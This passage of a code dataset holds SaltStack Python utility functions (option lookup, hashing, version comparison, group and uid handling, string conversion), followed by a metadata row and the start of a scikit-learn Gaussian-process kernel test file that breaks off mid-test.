def option(value, default='', opts=None, pillar=None):
'''
Pass in a generic option and receive the value that will be assigned
'''
if opts is None:
opts = {}
if pillar is None:
pillar = {}
sources = (
(opts, value),
(pillar, 'master:{0}'.format(value)),
(pillar, value),
)
for source, val in sources:
out = traverse_dict_and_list(source, val, default)
if out is not default:
return out
return default
def parse_docstring(docstring):
'''
Parse a docstring into its parts.
Currently only parses dependencies, can be extended to parse whatever is
needed.
Parses into a dictionary:
{
'full': full docstring,
'deps': list of dependencies (empty list if none)
}
'''
# First try with regex search for :depends:
ret = {}
ret['full'] = docstring
regex = r'([ \t]*):depends:[ \t]+- (\w+)[^\n]*\n(\1[ \t]+- (\w+)[^\n]*\n)*'
match = re.search(regex, docstring, re.M)
if match:
deps = []
regex = r'- (\w+)'
for line in match.group(0).strip().splitlines():
deps.append(re.search(regex, line).group(1))
ret['deps'] = deps
return ret
# Try searching for a one-liner instead
else:
txt = 'Required python modules: '
data = docstring.splitlines()
dep_list = list(x for x in data if x.strip().startswith(txt))
if not dep_list:
ret['deps'] = []
return ret
deps = dep_list[0].replace(txt, '').strip().split(', ')
ret['deps'] = deps
return ret
def print_cli(msg):
'''
Wrapper around print() that suppresses tracebacks on broken pipes (i.e.
when salt output is piped to less and less is stopped prematurely).
'''
try:
try:
print(msg)
except UnicodeEncodeError:
print(msg.encode('utf-8'))
except IOError as exc:
if exc.errno != errno.EPIPE:
raise
def safe_walk(top, topdown=True, onerror=None, followlinks=True, _seen=None):
'''
A clone of the python os.walk function with some checks for recursive
symlinks. Unlike os.walk this follows symlinks by default.
'''
islink, join, isdir = os.path.islink, os.path.join, os.path.isdir
if _seen is None:
_seen = set()
# We may not have read permission for top, in which case we can't
# get a list of the files the directory contains. os.path.walk
# always suppressed the exception then, rather than blow up for a
# minor reason when (say) a thousand readable directories are still
# left to visit. That logic is copied here.
try:
# Note that listdir and error are globals in this module due
# to earlier import-*.
names = os.listdir(top)
except os.error as err:
if onerror is not None:
onerror(err)
return
if followlinks:
status = os.stat(top)
# st_ino is always 0 on some filesystems (FAT, NTFS); ignore them
if status.st_ino != 0:
node = (status.st_dev, status.st_ino)
if node in _seen:
return
_seen.add(node)
dirs, nondirs = [], []
for name in names:
full_path = join(top, name)
if isdir(full_path):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = join(top, name)
if followlinks or not islink(new_path):
for x in safe_walk(new_path, topdown, onerror, followlinks, _seen):
yield x
if not topdown:
yield top, dirs, nondirs
def get_hash(path, form='sha256', chunk_size=65536):
'''
Get the hash sum of a file
This is better than ``get_sum`` for the following reasons:
- It does not read the entire file into memory.
- It does not return a string on error. The returned value of
``get_sum`` cannot really be trusted since it is vulnerable to
collisions: ``get_sum(..., 'xyz') == 'Hash xyz not supported'``
'''
hash_type = hasattr(hashlib, form) and getattr(hashlib, form) or None
if hash_type is None:
raise ValueError('Invalid hash type: {0}'.format(form))
with salt.utils.fopen(path, 'rb') as ifile:
hash_obj = hash_type()
        # read the file in chunks, not the entire file at once
for chunk in iter(lambda: ifile.read(chunk_size), b''):
hash_obj.update(chunk)
return hash_obj.hexdigest()
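# Illustrative usage (editor's example; the path and the digest shown are
# hypothetical):
#
#     >>> get_hash('/etc/hosts', form='md5')    # doctest: +SKIP
#     'a3f5c9...'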
def namespaced_function(function, global_dict, defaults=None):
'''
Redefine (clone) a function under a different globals() namespace scope
'''
if defaults is None:
defaults = function.__defaults__
new_namespaced_function = types.FunctionType(
function.__code__,
global_dict,
name=function.__name__,
argdefs=defaults
)
new_namespaced_function.__dict__.update(function.__dict__)
return new_namespaced_function
def alias_function(fun, name, doc=None):
'''
Copy a function
'''
alias_fun = types.FunctionType(fun.__code__,
fun.__globals__,
name,
fun.__defaults__,
fun.__closure__)
alias_fun.__dict__.update(fun.__dict__)
if doc and isinstance(doc, six.string_types):
alias_fun.__doc__ = doc
else:
orig_name = fun.__name__
alias_msg = ('\nThis function is an alias of '
'``{0}``.\n'.format(orig_name))
alias_fun.__doc__ = alias_msg + fun.__doc__
return alias_fun
def _win_console_event_handler(event):
if event == 5:
# Do nothing on CTRL_LOGOFF_EVENT
return True
return False
def enable_ctrl_logoff_handler():
if HAS_WIN32API:
win32api.SetConsoleCtrlHandler(_win_console_event_handler, 1)
def date_cast(date):
'''
Casts any object into a datetime.datetime object
date
any datetime, time string representation...
'''
if date is None:
return datetime.datetime.now()
elif isinstance(date, datetime.datetime):
return date
# fuzzy date
try:
if isinstance(date, six.string_types):
try:
if HAS_TIMELIB:
# py3: yes, timelib.strtodatetime wants bytes, not str :/
return timelib.strtodatetime(to_bytes(date))
except ValueError:
pass
# not parsed yet, obviously a timestamp?
if date.isdigit():
date = int(date)
else:
date = float(date)
return datetime.datetime.fromtimestamp(date)
except Exception:
if HAS_TIMELIB:
raise ValueError('Unable to parse {0}'.format(date))
raise RuntimeError('Unable to parse {0}.'
' Consider installing timelib'.format(date))
def date_format(date=None, format="%Y-%m-%d"):
'''
Converts date into a time-based string
date
any datetime, time string representation...
    format
        `strftime <http://docs.python.org/2/library/datetime.html#datetime.datetime.strftime>`_ format
>>> import datetime
>>> src = datetime.datetime(2002, 12, 25, 12, 00, 00, 00)
>>> date_format(src)
'2002-12-25'
>>> src = '2002/12/25'
>>> date_format(src)
'2002-12-25'
>>> src = 1040814000
>>> date_format(src)
'2002-12-25'
>>> src = '1040814000'
>>> date_format(src)
'2002-12-25'
'''
return date_cast(date).strftime(format)
def warn_until(version,
message,
category=DeprecationWarning,
stacklevel=None,
_version_info_=None,
_dont_call_warnings=False):
'''
Helper function to raise a warning, by default, a ``DeprecationWarning``,
until the provided ``version``, after which, a ``RuntimeError`` will
be raised to remind the developers to remove the warning because the
target version has been reached.
:param version: The version info or name after which the warning becomes a
``RuntimeError``. For example ``(0, 17)`` or ``Hydrogen``
or an instance of :class:`salt.version.SaltStackVersion`.
:param message: The warning message to be displayed.
:param category: The warning class to be thrown, by default
``DeprecationWarning``
:param stacklevel: There should be no need to set the value of
``stacklevel``. Salt should be able to do the right thing.
:param _version_info_: In order to reuse this function for other SaltStack
projects, they need to be able to provide the
version info to compare to.
    :param _dont_call_warnings: Skip emitting the warning itself and only run
                                the salt version check, which raises a
                                ``RuntimeError`` once the target version is
                                reached.
'''
if not isinstance(version, (tuple,
six.string_types,
salt.version.SaltStackVersion)):
raise RuntimeError(
'The \'version\' argument should be passed as a tuple, string or '
'an instance of \'salt.version.SaltStackVersion\'.'
)
elif isinstance(version, tuple):
version = salt.version.SaltStackVersion(*version)
elif isinstance(version, six.string_types):
version = salt.version.SaltStackVersion.from_name(version)
if stacklevel is None:
# Attribute the warning to the calling function, not to warn_until()
stacklevel = 2
if _version_info_ is None:
_version_info_ = salt.version.__version_info__
_version_ = salt.version.SaltStackVersion(*_version_info_)
if _version_ >= version:
import inspect
caller = inspect.getframeinfo(sys._getframe(stacklevel - 1))
raise RuntimeError(
'The warning triggered on filename \'{filename}\', line number '
'{lineno}, is supposed to be shown until version '
'{until_version} is released. Current version is now '
'{salt_version}. Please remove the warning.'.format(
filename=caller.filename,
lineno=caller.lineno,
until_version=version.formatted_version,
salt_version=_version_.formatted_version
),
)
if _dont_call_warnings is False:
def _formatwarning(message,
category,
filename,
lineno,
line=None): # pylint: disable=W0613
'''
Replacement for warnings.formatwarning that disables the echoing of
the 'line' parameter.
'''
return '{0}:{1}: {2}: {3}\n'.format(
filename, lineno, category.__name__, message
)
saved = warnings.formatwarning
warnings.formatwarning = _formatwarning
warnings.warn(
message.format(version=version.formatted_version),
category,
stacklevel=stacklevel
)
warnings.formatwarning = saved
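# Usage sketch (illustrative; 'Carbon' stands in for whichever release the
# deprecation actually targets -- the '{version}' placeholder is expanded by
# warn_until itself):
#
#     def fetch(timeout=None):
#         if timeout is not None:
#             warn_until(
#                 'Carbon',
#                 'The \'timeout\' argument is deprecated and will be '
#                 'removed in {version}.'
#             )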
def kwargs_warn_until(kwargs,
version,
category=DeprecationWarning,
stacklevel=None,
_version_info_=None,
_dont_call_warnings=False):
'''
Helper function to raise a warning (by default, a ``DeprecationWarning``)
    when unhandled keyword arguments are passed to a function, until the
    provided ``version``, after which a ``RuntimeError`` will be raised
to remind the developers to remove the ``**kwargs`` because the target
version has been reached.
This function is used to help deprecate unused legacy ``**kwargs`` that
were added to function parameters lists to preserve backwards compatibility
when removing a parameter. See
:doc:`the deprecation development docs </topics/development/deprecations>`
for the modern strategy for deprecating a function parameter.
:param kwargs: The caller's ``**kwargs`` argument value (a ``dict``).
:param version: The version info or name after which the warning becomes a
``RuntimeError``. For example ``(0, 17)`` or ``Hydrogen``
or an instance of :class:`salt.version.SaltStackVersion`.
:param category: The warning class to be thrown, by default
``DeprecationWarning``
:param stacklevel: There should be no need to set the value of
``stacklevel``. Salt should be able to do the right thing.
:param _version_info_: In order to reuse this function for other SaltStack
projects, they need to be able to provide the
version info to compare to.
    :param _dont_call_warnings: When True, skip emitting the warning itself
                                and only run the salt version check that
                                raises a ``RuntimeError`` once the target
                                version has been reached.
'''
if not isinstance(version, (tuple,
six.string_types,
salt.version.SaltStackVersion)):
raise RuntimeError(
'The \'version\' argument should be passed as a tuple, string or '
'an instance of \'salt.version.SaltStackVersion\'.'
)
elif isinstance(version, tuple):
version = salt.version.SaltStackVersion(*version)
elif isinstance(version, six.string_types):
version = salt.version.SaltStackVersion.from_name(version)
if stacklevel is None:
# Attribute the warning to the calling function,
# not to kwargs_warn_until() or warn_until()
stacklevel = 3
if _version_info_ is None:
_version_info_ = salt.version.__version_info__
_version_ = salt.version.SaltStackVersion(*_version_info_)
if kwargs or _version_.info >= version.info:
arg_names = ', '.join('\'{0}\''.format(key) for key in kwargs)
warn_until(
version,
message='The following parameter(s) have been deprecated and '
'will be removed in \'{0}\': {1}.'.format(version.string,
arg_names),
category=category,
stacklevel=stacklevel,
_version_info_=_version_.info,
_dont_call_warnings=_dont_call_warnings
)
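# Usage sketch (illustrative): pass the function's unhandled kwargs straight
# through so every leftover name is reported in the warning:
#
#     def install(name, **kwargs):
#         if kwargs:
#             kwargs_warn_until(kwargs, 'Carbon')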
def version_cmp(pkg1, pkg2, ignore_epoch=False):
'''
Compares two version strings using distutils.version.LooseVersion. This is
a fallback for providers which don't have a version comparison utility
built into them. Return -1 if version1 < version2, 0 if version1 ==
version2, and 1 if version1 > version2. Return None if there was a problem
making the comparison.
'''
normalize = lambda x: str(x).split(':', 1)[-1] if ignore_epoch else str(x)
pkg1 = normalize(pkg1)
pkg2 = normalize(pkg2)
try:
# pylint: disable=no-member
if distutils.version.LooseVersion(pkg1) < \
distutils.version.LooseVersion(pkg2):
return -1
elif distutils.version.LooseVersion(pkg1) == \
distutils.version.LooseVersion(pkg2):
return 0
elif distutils.version.LooseVersion(pkg1) > \
distutils.version.LooseVersion(pkg2):
return 1
except Exception as exc:
log.exception(exc)
return None
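# Example (distutils.version.LooseVersion compares release components
# numerically):
#
#     version_cmp('1.2', '1.10')                       # -1  ('1.10' is newer)
#     version_cmp('1:1.0', '1.0', ignore_epoch=True)   # 0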
def compare_versions(ver1='',
oper='==',
ver2='',
cmp_func=None,
ignore_epoch=False):
'''
Compares two version numbers. Accepts a custom function to perform the
cmp-style version comparison, otherwise uses version_cmp().
'''
cmp_map = {'<': (-1,), '<=': (-1, 0), '==': (0,),
'>=': (0, 1), '>': (1,)}
if oper not in ('!=',) and oper not in cmp_map:
log.error('Invalid operator \'%s\' for version comparison', oper)
return False
if cmp_func is None:
cmp_func = version_cmp
cmp_result = cmp_func(ver1, ver2, ignore_epoch=ignore_epoch)
if cmp_result is None:
return False
# Check if integer/long
if not isinstance(cmp_result, numbers.Integral):
log.error('The version comparison function did not return an '
'integer/long.')
return False
if oper == '!=':
return cmp_result not in cmp_map['==']
else:
# Gracefully handle cmp_result not in (-1, 0, 1).
if cmp_result < -1:
cmp_result = -1
elif cmp_result > 1:
cmp_result = 1
return cmp_result in cmp_map[oper]
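# Example:
#
#     compare_versions('0.17.0', '>=', '0.16.4')   # True
#     compare_versions('0.17.0', '!=', '0.17.0')   # False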
def compare_dicts(old=None, new=None):
'''
Compare before and after results from various salt functions, returning a
dict describing the changes that were made.
'''
    ret = {}
    # Normalize None to empty dicts so the lookups below cannot fail
    old = old or {}
    new = new or {}
    for key in set(new).union(old):
if key not in old:
# New key
ret[key] = {'old': '',
'new': new[key]}
elif key not in new:
# Key removed
ret[key] = {'new': '',
'old': old[key]}
elif new[key] != old[key]:
# Key modified
ret[key] = {'old': old[key],
'new': new[key]}
return ret
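# Example:
#
#     compare_dicts({'a': 1, 'b': 2}, {'a': 1, 'b': 3, 'c': 4})
#     # -> {'b': {'old': 2, 'new': 3}, 'c': {'old': '', 'new': 4}}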
def compare_lists(old=None, new=None):
'''
Compare before and after results from various salt functions, returning a
dict describing the changes that were made
'''
    ret = {}
    # Accumulate changes into lists; assigning a single key here would
    # silently drop all but the last added/removed item
    for item in new or []:
        if item not in (old or []):
            ret.setdefault('new', []).append(item)
    for item in old or []:
        if item not in (new or []):
            ret.setdefault('old', []).append(item)
    return ret
def argspec_report(functions, module=''):
'''
Pass in a functions dict as it is returned from the loader and return the
argspec function signatures
'''
ret = {}
# TODO: cp.get_file will also match cp.get_file_str. this is the
# same logic as sys.doc, and it is not working as expected, see
# issue #3614
_use_fnmatch = False
if '*' in module:
target_mod = module
_use_fnmatch = True
elif module:
# allow both "sys" and "sys." to match sys, without also matching
# sysctl
target_module = module + '.' if not module.endswith('.') else module
else:
target_module = ''
if _use_fnmatch:
for fun in fnmatch.filter(functions, target_mod):
try:
aspec = salt.utils.args.get_function_argspec(functions[fun])
except TypeError:
# this happens if not callable
continue
args, varargs, kwargs, defaults = aspec
ret[fun] = {}
ret[fun]['args'] = args if args else None
ret[fun]['defaults'] = defaults if defaults else None
ret[fun]['varargs'] = True if varargs else None
ret[fun]['kwargs'] = True if kwargs else None
else:
for fun in functions:
if fun == module or fun.startswith(target_module):
try:
aspec = salt.utils.args.get_function_argspec(functions[fun])
except TypeError:
# this happens if not callable
continue
args, varargs, kwargs, defaults = aspec
ret[fun] = {}
ret[fun]['args'] = args if args else None
ret[fun]['defaults'] = defaults if defaults else None
ret[fun]['varargs'] = True if varargs else None
ret[fun]['kwargs'] = True if kwargs else None
return ret
def decode_list(data):
'''
JSON decodes as unicode, Jinja needs bytes...
'''
rv = []
for item in data:
if isinstance(item, six.text_type) and six.PY2:
item = item.encode('utf-8')
elif isinstance(item, list):
item = decode_list(item)
elif isinstance(item, dict):
item = decode_dict(item)
rv.append(item)
return rv
def decode_dict(data):
'''
JSON decodes as unicode, Jinja needs bytes...
'''
rv = {}
for key, value in six.iteritems(data):
if isinstance(key, six.text_type) and six.PY2:
key = key.encode('utf-8')
if isinstance(value, six.text_type) and six.PY2:
value = value.encode('utf-8')
elif isinstance(value, list):
value = decode_list(value)
elif isinstance(value, dict):
value = decode_dict(value)
rv[key] = value
return rv
def find_json(raw):
'''
    Pass in a raw string and load the json where it starts. This allows a
    string that starts with garbage and ends with json to be cleanly loaded
'''
ret = {}
for ind in range(len(raw)):
working = '\n'.join(raw.splitlines()[ind:])
try:
ret = json.loads(working, object_hook=decode_dict)
except ValueError:
continue
if ret:
return ret
    if not ret:
        # Not json, raise an error
        raise ValueError('No valid JSON found in the passed string')
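# Example: leading garbage is discarded one line at a time until the
# remainder parses as JSON (on Python 2 the keys/values come back utf-8
# encoded via decode_dict):
#
#     find_json('log noise\n{"result": true}')   # -> {'result': True}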
def is_bin_file(path):
'''
Detects if the file is a binary, returns bool. Returns True if the file is
a bin, False if the file is not and None if the file is not available.
'''
if not os.path.isfile(path):
return None
try:
with fopen(path, 'r') as fp_:
return is_bin_str(fp_.read(2048))
except os.error:
return None
def is_bin_str(data):
'''
Detects if the passed string of data is bin or text
'''
if '\0' in data:
return True
if not data:
return False
text_characters = ''.join([chr(x) for x in range(32, 127)] + list('\n\r\t\b'))
# Get the non-text characters (map each character to itself then use the
# 'remove' option to get rid of the text characters.)
if six.PY3:
trans = ''.maketrans('', '', text_characters)
nontext = data.translate(trans)
else:
trans = string.maketrans('', '')
nontext = data.translate(trans, text_characters)
# If more than 30% non-text characters, then
# this is considered a binary file
    if float(len(nontext)) / len(data) > 0.30:
return True
return False
def is_dictlist(data):
'''
Returns True if data is a list of one-element dicts (as found in many SLS
schemas), otherwise returns False
'''
if isinstance(data, list):
for element in data:
if isinstance(element, dict):
if len(element) != 1:
return False
else:
return False
return True
return False
def repack_dictlist(data):
'''
Takes a list of one-element dicts (as found in many SLS schemas) and
repacks into a single dictionary.
'''
if isinstance(data, six.string_types):
try:
import yaml
data = yaml.safe_load(data)
except yaml.parser.ParserError as err:
log.error(err)
return {}
if not isinstance(data, list) \
or [x for x in data
if not isinstance(x, (six.string_types, int, float, dict))]:
log.error('Invalid input: {0}'.format(pprint.pformat(data)))
log.error('Input must be a list of strings/dicts')
return {}
ret = {}
for element in data:
if isinstance(element, (six.string_types, int, float)):
ret[element] = None
else:
if len(element) != 1:
log.error('Invalid input: key/value pairs must contain '
'only one element (data passed: {0}).'
.format(element))
return {}
ret.update(element)
return ret
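# Example: the one-element-dict lists common in SLS data repack cleanly,
# with bare strings mapping to None:
#
#     repack_dictlist([{'user': 'root'}, {'group': 'wheel'}, 'enabled'])
#     # -> {'user': 'root', 'group': 'wheel', 'enabled': None}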
def get_group_list(user=None, include_default=True):
'''
Returns a list of all of the system group names of which the user
is a member.
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty list
return []
group_names = None
ugroups = set()
    if not isinstance(user, six.string_types):
        raise Exception('Username must be a string')
if hasattr(os, 'getgrouplist'):
# Try os.getgrouplist, available in python >= 3.3
log.trace('Trying os.getgrouplist for \'{0}\''.format(user))
try:
group_names = [
grp.getgrgid(grpid).gr_name for grpid in
os.getgrouplist(user, pwd.getpwnam(user).pw_gid)
]
except Exception:
pass
else:
# Try pysss.getgrouplist
log.trace('Trying pysss.getgrouplist for \'{0}\''.format(user))
try:
import pysss # pylint: disable=import-error
group_names = list(pysss.getgrouplist(user))
except Exception:
pass
if group_names is None:
# Fall back to generic code
# Include the user's default group to behave like
# os.getgrouplist() and pysss.getgrouplist() do
log.trace('Trying generic group list for \'{0}\''.format(user))
group_names = [g.gr_name for g in grp.getgrall() if user in g.gr_mem]
try:
default_group = grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name
if default_group not in group_names:
group_names.append(default_group)
except KeyError:
# If for some reason the user does not have a default group
pass
ugroups.update(group_names)
if include_default is False:
# Historically, saltstack code for getting group lists did not
# include the default group. Some things may only want
# supplemental groups, so include_default=False omits the users
# default group.
try:
default_group = grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name
ugroups.remove(default_group)
except KeyError:
# If for some reason the user does not have a default group
pass
log.trace('Group list for user \'{0}\': \'{1}\''.format(user, sorted(ugroups)))
return sorted(ugroups)
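# Example (illustrative only -- the result depends entirely on the local
# group database):
#
#     get_group_list('root')                          # e.g. ['root', 'wheel']
#     get_group_list('root', include_default=False)   # e.g. ['wheel']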
def get_group_dict(user=None, include_default=True):
'''
Returns a dict of all of the system groups as keys, and group ids
as values, of which the user is a member.
E.g.: {'staff': 501, 'sudo': 27}
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty dict
return {}
group_dict = {}
group_names = get_group_list(user, include_default=include_default)
for group in group_names:
group_dict.update({group: grp.getgrnam(group).gr_gid})
return group_dict
def get_gid_list(user=None, include_default=True):
'''
Returns a list of all of the system group IDs of which the user
is a member.
'''
if HAS_GRP is False or HAS_PWD is False:
# We don't work on platforms that don't have grp and pwd
# Just return an empty list
return []
gid_list = [
gid for (group, gid) in
six.iteritems(salt.utils.get_group_dict(user, include_default=include_default))
]
return sorted(set(gid_list))
def total_seconds(td):
'''
Takes a timedelta and returns the total number of seconds
represented by the object. Wrapper for the total_seconds()
method which does not exist in versions of Python < 2.7.
'''
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10**6
def import_json():
'''
    Import a json module, starting with the quick ones and going down the list
'''
for fast_json in ('ujson', 'yajl', 'json'):
try:
mod = __import__(fast_json)
log.trace('loaded {0} json lib'.format(fast_json))
return mod
except ImportError:
continue
def appendproctitle(name):
'''
Append "name" to the current process title
'''
if HAS_SETPROCTITLE:
setproctitle.setproctitle(setproctitle.getproctitle() + ' ' + name)
def chugid(runas):
'''
    Change the current process to belong to
    the specified user (and the groups to which it belongs)
'''
uinfo = pwd.getpwnam(runas)
supgroups = []
supgroups_seen = set()
# The line below used to exclude the current user's primary gid.
# However, when root belongs to more than one group
# this causes root's primary group of '0' to be dropped from
# his grouplist. On FreeBSD, at least, this makes some
# command executions fail with 'access denied'.
#
# The Python documentation says that os.setgroups sets only
# the supplemental groups for a running process. On FreeBSD
# this does not appear to be strictly true.
group_list = get_group_dict(runas, include_default=True)
if sys.platform == 'darwin':
group_list = dict((k, v) for k, v in six.iteritems(group_list)
if not k.startswith('_'))
for group_name in group_list:
gid = group_list[group_name]
if (gid not in supgroups_seen
and not supgroups_seen.add(gid)):
supgroups.append(gid)
if os.getgid() != uinfo.pw_gid:
try:
os.setgid(uinfo.pw_gid)
except OSError as err:
raise CommandExecutionError(
'Failed to change from gid {0} to {1}. Error: {2}'.format(
os.getgid(), uinfo.pw_gid, err
)
)
# Set supplemental groups
if sorted(os.getgroups()) != sorted(supgroups):
try:
os.setgroups(supgroups)
except OSError as err:
raise CommandExecutionError(
'Failed to set supplemental groups to {0}. Error: {1}'.format(
supgroups, err
)
)
if os.getuid() != uinfo.pw_uid:
try:
os.setuid(uinfo.pw_uid)
except OSError as err:
raise CommandExecutionError(
'Failed to change from uid {0} to {1}. Error: {2}'.format(
os.getuid(), uinfo.pw_uid, err
)
)
def chugid_and_umask(runas, umask):
'''
    Helper method for subprocess.Popen to initialise uid/gid and umask
for the new process.
'''
if runas is not None:
chugid(runas)
if umask is not None:
os.umask(umask)
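# Usage sketch (assumes a POSIX platform, sufficient privileges, and that a
# 'nobody' account exists): chugid_and_umask is shaped to be used as a
# subprocess preexec_fn:
#
#     import functools
#     import subprocess
#     subprocess.Popen(
#         ['id'],
#         preexec_fn=functools.partial(chugid_and_umask, 'nobody', 0o077),
#     )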
def rand_string(size=32):
    # str.encode('base64') only exists on Python 2; use the base64 module.
    # b64encode never inserts newlines; to_str keeps the str return type.
    import base64
    key = os.urandom(size)
    return to_str(base64.b64encode(key))
def relpath(path, start='.'):
'''
Work around Python bug #5117, which is not (and will not be) patched in
Python 2.6 (http://bugs.python.org/issue5117)
'''
if sys.version_info < (2, 7) and 'posix' in sys.builtin_module_names:
# The below code block is based on posixpath.relpath from Python 2.7,
# which has the fix for this bug.
if not path:
raise ValueError('no path specified')
start_list = [
x for x in os.path.abspath(start).split(os.path.sep) if x
]
path_list = [
x for x in os.path.abspath(path).split(os.path.sep) if x
]
# work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.path.curdir
return os.path.join(*rel_list)
return os.path.relpath(path, start=start)
def human_size_to_bytes(human_size):
'''
Convert human-readable units to bytes
'''
size_exp_map = {'K': 1, 'M': 2, 'G': 3, 'T': 4, 'P': 5}
human_size_str = str(human_size)
match = re.match(r'^(\d+)([KMGTP])?$', human_size_str)
if not match:
raise ValueError(
'Size must be all digits, with an optional unit type '
'(K, M, G, T, or P)'
)
size_num = int(match.group(1))
unit_multiplier = 1024 ** size_exp_map.get(match.group(2), 0)
return size_num * unit_multiplier
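# Example: units are powers of 1024.
#
#     human_size_to_bytes('10K')   # 10240
#     human_size_to_bytes('1T')    # 1099511627776
#     human_size_to_bytes(42)      # 42 (no unit suffix)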
def to_str(s, encoding=None):
'''
Given str, bytes, bytearray, or unicode (py2), return str
'''
if isinstance(s, str):
return s
if six.PY3:
if isinstance(s, (bytes, bytearray)):
return s.decode(encoding or __salt_system_encoding__)
raise TypeError('expected str, bytes, or bytearray')
else:
if isinstance(s, bytearray):
return str(s)
if isinstance(s, unicode): # pylint: disable=incompatible-py3-code
return s.encode(encoding or __salt_system_encoding__)
raise TypeError('expected str, bytearray, or unicode')
def to_bytes(s, encoding=None):
'''
Given bytes, bytearray, str, or unicode (python 2), return bytes (str for
python 2)
'''
if six.PY3:
if isinstance(s, bytes):
return s
if isinstance(s, bytearray):
return bytes(s)
if isinstance(s, str):
return s.encode(encoding or __salt_system_encoding__)
raise TypeError('expected bytes, bytearray, or str')
else:
return to_str(s, encoding)
def to_unicode(s, encoding=None):
'''
Given str or unicode, return unicode (str for python 3)
'''
if six.PY3:
return to_str(s, encoding)
else:
if isinstance(s, str):
return s.decode(encoding or __salt_system_encoding__)
return unicode(s) # pylint: disable=incompatible-py3-code
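# Examples (a minimal sketch of the three converters; behaviour shown for
# Python 3, assuming __salt_system_encoding__ is 'utf-8'):
#
#     to_str(b'salt')       # 'salt'
#     to_bytes('salt')      # b'salt'
#     to_unicode(b'salt')   # 'salt'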
def is_list(value):
'''
Check if a variable is a list.
'''
return isinstance(value, list)
def is_iter(y, ignore=six.string_types):
'''
    Test if an object is an iterator or is otherwise iterable. By default
    this does not return True for string objects.
The `ignore` argument defaults to a list of string types that are not
considered iterable. This can be used to also exclude things like
dictionaries or named tuples.
Based on https://bitbucket.org/petershinners/yter
'''
if ignore and isinstance(y, ignore):
return False
try:
iter(y)
return True
except TypeError:
return False
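# Examples:
#
#     is_iter([1, 2, 3])               # True
#     is_iter('a string')              # False (strings are ignored by default)
#     is_iter({'a': 1}, ignore=dict)   # False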
def invalid_kwargs(invalid_kwargs, raise_exc=True):
'''
Raise a SaltInvocationError if invalid_kwargs is non-empty
'''
if invalid_kwargs:
if isinstance(invalid_kwargs, dict):
new_invalid = [
'{0}={1}'.format(x, y)
for x, y in six.iteritems(invalid_kwargs)
]
invalid_kwargs = new_invalid
msg = (
'The following keyword arguments are not valid: {0}'
.format(', '.join(invalid_kwargs))
)
if raise_exc:
raise SaltInvocationError(msg)
else:
return msg
def shlex_split(s, **kwargs):
'''
Only split if variable is a string
'''
if isinstance(s, six.string_types):
return shlex.split(s, **kwargs)
else:
return s
def split_input(val):
'''
Take an input value and split it into a list, returning the resulting list
'''
if isinstance(val, list):
return val
try:
return [x.strip() for x in val.split(',')]
except AttributeError:
return [x.strip() for x in str(val).split(',')]
def str_version_to_evr(verstring):
'''
Split the package version string into epoch, version and release.
Return this as tuple.
    The epoch is never empty. The version and the release can be an empty
    string if such a component could not be found in the version string.
    "2:1.0-1.2" => ('2', '1.0', '1.2')
"1.0" => ('0', '1.0', '')
"" => ('0', '', '')
'''
if verstring in [None, '']:
return '0', '', ''
idx_e = verstring.find(':')
if idx_e != -1:
try:
epoch = str(int(verstring[:idx_e]))
except ValueError:
# look, garbage in the epoch field, how fun, kill it
epoch = '0' # this is our fallback, deal
else:
epoch = '0'
idx_r = verstring.find('-')
if idx_r != -1:
version = verstring[idx_e + 1:idx_r]
release = verstring[idx_r + 1:]
else:
version = verstring[idx_e + 1:]
release = ''
return epoch, version, release
|
stephane-martin/salt-debian-packaging
|
salt-2016.3.2/salt/utils/__init__.py
|
Python
|
apache-2.0
| 93,870
|
[
"VisIt"
] |
dba6828bd1056d4bdb2c8d0eb3ccef766f449451d73bab0c49b0f387f39ce324
|
"""Testing for kernels for Gaussian processes."""
# Author: Jan Hendrik Metzen <jhm@informatik.uni-bremen.de>
# Licence: BSD 3 clause
from collections import Hashable
import numpy as np
from sklearn.base import clone
from sklearn.externals.funcsigs import signature
from sklearn.gaussian_process.kernels \
import (RBF, Matern, RationalQuadratic, ExpSineSquared, DotProduct,
ConstantKernel, WhiteKernel, PairwiseKernel, KernelOperator,
Exponentiation)
from sklearn.gaussian_process.kernels import _approx_fprime
from sklearn.metrics.pairwise \
import PAIRWISE_KERNEL_FUNCTIONS, euclidean_distances, pairwise_kernels
from sklearn.utils.testing import (assert_equal, assert_almost_equal,
assert_not_equal, assert_array_equal,
assert_array_almost_equal)
X = np.random.RandomState(0).normal(0, 1, (5, 2))
Y = np.random.RandomState(0).normal(0, 1, (6, 2))
kernel_white = RBF(length_scale=2.0) + WhiteKernel(noise_level=3.0)
kernels = [RBF(length_scale=2.0), RBF(length_scale_bounds=(0.5, 2.0)),
ConstantKernel(constant_value=10.0),
2.0 * RBF(length_scale=0.33, length_scale_bounds="fixed"),
2.0 * RBF(length_scale=0.5), kernel_white,
2.0 * RBF(length_scale=[0.5, 2.0]),
2.0 * Matern(length_scale=0.33, length_scale_bounds="fixed"),
2.0 * Matern(length_scale=0.5, nu=0.5),
2.0 * Matern(length_scale=1.5, nu=1.5),
2.0 * Matern(length_scale=2.5, nu=2.5),
2.0 * Matern(length_scale=[0.5, 2.0], nu=0.5),
3.0 * Matern(length_scale=[2.0, 0.5], nu=1.5),
4.0 * Matern(length_scale=[0.5, 0.5], nu=2.5),
RationalQuadratic(length_scale=0.5, alpha=1.5),
ExpSineSquared(length_scale=0.5, periodicity=1.5),
DotProduct(sigma_0=2.0), DotProduct(sigma_0=2.0) ** 2]
for metric in PAIRWISE_KERNEL_FUNCTIONS:
if metric in ["additive_chi2", "chi2"]:
continue
kernels.append(PairwiseKernel(gamma=1.0, metric=metric))
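# A note on composition (illustrative, not one of the test fixtures): the
# kernel arithmetic above builds KernelOperator instances whose theta vector
# is the concatenation of the operands' log-transformed hyperparameters, e.g.
#
#     k = 2.0 * RBF(length_scale=0.5)
#     # k.theta == np.log([2.0, 0.5])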
def test_kernel_gradient():
""" Compare analytic and numeric gradient of kernels. """
for kernel in kernels:
K, K_gradient = kernel(X, eval_gradient=True)
assert_equal(K_gradient.shape[0], X.shape[0])
